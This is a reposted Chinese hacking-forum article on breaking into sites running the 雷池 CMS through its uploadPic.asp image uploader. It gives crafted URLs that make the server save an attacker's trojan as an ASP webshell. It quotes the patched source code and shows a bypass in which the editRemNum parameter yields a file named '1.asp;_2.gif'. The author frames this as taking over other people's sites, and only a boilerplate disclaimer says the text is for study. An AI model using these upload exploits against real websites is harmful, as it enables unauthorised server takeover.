欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

雷池上传漏洞修复之突破

来源:本站转载 作者:佚名 时间:2010-05-24 TAG: 我要投稿

本文为引用   估计是4月的时候出的    测试了下   应该对朋友们有用吧    如果有帮助大家就给我顶起来
雷池上传的利用其实是很早以前的事了,后来出了补丁

某日一人叫我拿几个站发现都有打了补丁的雷池,后来偶然间看了看代码,遂有此文

以下是雷池上传的介绍

==========================================

假如雷池的上传文件uploadPic.asp在admin目录下即admin/uploadPic.asp

那么我们可以这样利用漏洞:

在浏览器中输入:http://www.xxxx.com/admin/uploadPic.asp?actionType=mod& picName=webshell.asp出现上传的地方.把我们的马改成以.gif结尾的文件,上传就可以得到一个名为webshell.asp的 webshell了!

注意,我们上传的webshell到底怎么知道上传在哪里去了呢?

我们可以这样来找,我们查看改网站发表的文章,这里我们可以看到加了图片的文章,我们右键图片,查看属性,就可以知道上传的木马在哪个目录了,我们的木马应该就是http://www.xxxx.com/admin/upload/webshell.asp


================================

打了补丁后似乎是过滤了%和.只类的符号,也就是说定义文件名是1.ASP时,返回文件名是1asp.gif


dim upload_code,remNum,remFileName,editImageNum,actionType,editRemNum

upload_code = trim(Request.QueryString("upload_code"))
editImageNum = trim(Request.QueryString("editImageNum"))
actionType = trim(Request.QueryString("actionType"))
picName = trim(Request.QueryString("picName"))
editRemNum = trim(Request.QueryString("editRemNum"))

if actionType= "mod" then
   picName = Right(picName,InstrRev(picName,"/")-1)
end if

if upload_code = "ok" then
'获取文章中的图片     
    dim upload,file,formName,formPath,iCount
formPath="../uppic/"
.........
    else     
       if file.FileSize>0 then         ''如果 FileSize > 0 说明有文件数据  
          '生成图片名字
          if actionType= "mod" then
             remFileName = replace(Right(picName,len(picName)-InstrRev(picName,"/")),".","")&".gif"
                  
          else
             if editRemNum<>"" then                 
                remNum = editRemNum
             else
                Randomize
                remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
             end if
             remFileName = remNum&"_"&(editImageNum+1)&".gif"
          end if
           
          file.SaveAs Server.mappath(formPath&remFileName)   ''保存文件  
   Response.Write(formPath&remFileName)

可以看出editRemNum不为空时remFileName = remNum&"_"&(editImageNum+1)&".gif"
然而在接受参数时 但没有进行过滤 于是构造uploadPic.asp?actionType=od&editRemNum=1.asp;& upload_code=ok&editImageNum=1
得到一个名为1.asp;_2.gif的WEBSHELL

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载